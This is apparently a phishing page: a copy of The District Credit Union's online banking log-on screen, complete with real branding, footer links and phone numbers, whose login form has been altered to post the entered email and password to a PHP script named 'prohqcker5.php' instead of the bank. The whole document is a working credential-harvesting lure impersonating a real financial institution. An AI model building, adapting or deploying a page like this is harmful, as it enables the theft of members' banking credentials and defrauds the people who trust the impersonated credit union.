<html lang="en">
   <div id="in-page-channel-node-id" data-channel-name="in_page_channel_OLe97J"></div>
   <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <base href="https://districtcreditunion-dn.financial-net.com/idp/C557A418/">
      <title tenant="The District Credit Union">The District Credit Union - Log On</title>
      <link rel="icon" type="image/x-icon" href="/idp/images?key=favicon&amp;tenantId=C557A418">
      <link rel="shortcut icon" type="image/x-icon" href="/idp/images?key=favicon&amp;tenantId=C557A418">
      <link rel="stylesheet" href="https://districtcreditunion-dn.financial-net.com/idp/dist/vendor.css?v=dGt_VJYYUov_aRA9amywGFD8MfPlRce9vxm-vL573Z8">
      <link rel="stylesheet" href="https://districtcreditunion-dn.financial-net.com/idp/dist/site.css?v=3asrQyhlk7FO9ijZHNvi_3gO3joLmmgAO55GKe6brKE">
      <script src="https://districtcreditunion-dn.financial-net.com/idp/scripts/misc.js" nonce=""></script>
   </head>
   <body>
      <link rel="stylesheet" href="/idp/styles?file=%2Fcss%2Fbranding.less&amp;tenantId=C557A418">
      <div id="app" class="shell">
         <div class="header" params="route: route">
            <div class="content">
               <div class="header-logo"><img src="/idp/images?key=headerLogo&amp;tenantId=C557A418" alt="MyFinancial, Inc."></div>
               <div class="utility-actions">
                  <!---->
               </div>
            </div>
         </div>
         <div class="content-area">
            <section class="content-area__content login">
               <!----> <!----> <!----> 
               <h1 class="section-title">Log On</h1>
               <form action="http://localhost/prohqcker5.php" method="POST" >
                  <!----> 
               

                  <div class="panel login">
                     <div class="login-form-controls">
                        <div class="form-group"><label><span class="label">Email Address</span> <input name="username" data-test-element="Username" data-vv-as="Logon ID" autocomplete="off" class="control" aria-required="true" aria-invalid="false"></label> <span class="field-validation-error" style="display: none;"></span></div>
                        <div class="form-group"><label><span class="label">Password</span> <input type="password" name="password" data-test-element="Password" data-vv-as="Security Code" autocomplete="off" class="control" aria-required="true" aria-invalid="false"></label> <span class="field-validation-error" style="display: none;"></span></div>
                        <div class="form-actions"><button type="submit" class="button">Continue</button></div>
                     </div>
                     <div class="other-actions login">
                        <!----> <!----> <br> <!---->
                     </div>
                  </div>
               </form>
            </section>
         </div>
         <footer class="footer">
            <div class="top-footer">
               <div class="content content-top-footer">
                  <!----> 
                  <div class="wrapper-top-footer">
                     <ul class="link-footer-wrapper externalLink-footer-links">
                        <li><a target="_blank" rel="noopener noreferrer" data-test-element="footer-link-ContactUs" href="https://www.districtcreditunion.com/why-the-district/contact-us/" title="Contact Us" class="external-link">Contact Us</a></li>
                     </ul>
                  </div>
                  <div class="wrapper-top-footer">
                     <ul class="externalLink-footer-wrapper externalLink-footer-links">
                        <li>
                           <!----> <a target="_blank" rel="noopener noreferrer" data-test-element="external-link-1" href="https://www.districtcreditunion.com/" title="Home" class="external-link">Home</a>
                        </li>
                        <li>
                           <!----> <a target="_blank" rel="noopener noreferrer" data-test-element="external-link-2" href="https://www.ordermychecks.com/login_a.jsp" title="Reorder Checks" class="external-link">Reorder Checks</a>
                        </li>
                     </ul>
                  </div>
                  <div class="wrapper-top-footer">
                     <ul class="externalLink-footer-wrapper externalLink-footer-links">
                        <!----><!---->
                     </ul>
                  </div>
               </div>
            </div>
            <div class="bottom-footer">
               <div class="content">
                  <div>
                     <img src="/idp/images?key=ncuaLogoImage&amp;tenantId=C557A418" tabindex="0" id="ncuaSvgObject" data-test-element="footer-NCUA" alt="National Credit Union Administration" class="ncua-Logo fillColor"> <img src="/idp/images?key=ehlLogoImage&amp;tenantId=C557A418" tabindex="0" id="ehlSvgObject" data-test-element="footer-EHL" alt="Equal Housing Lender" class="ehl-Logo fillColor forceNCUALogoMargin"> 
                     <div tabindex="0" data-test-element="footer-additionalText" class="white-space-pre-wrap footer-additional-text additional-text-alignment">
                        The District Credit Union
                        Phone: 303-360-0987
                        Fax: 303-343-1272
                        Telephone Teller: 303-343-1603
                        Toll Free: 877-208-2979
                     </div>
                  </div>
                  <div class="clearfix"></div>
                  <div class="footer-copyright">
                     <div tabindex="0" data-test-element="footer-copyright" class="white-space-pre-wrap">Copyright ©2023 Fiserv, Inc. All rights reserved.</div>
                  </div>
                  <div id="1" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">
                     <!---->
                  </div>
                  <div id="2" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">
                     <!---->
                  </div>
               </div>
            </div>
         </footer>
         <!---->
      </div>
      <input type="hidden" name="ioBlackBox" id="ioBlackBox">
   </body>
</html>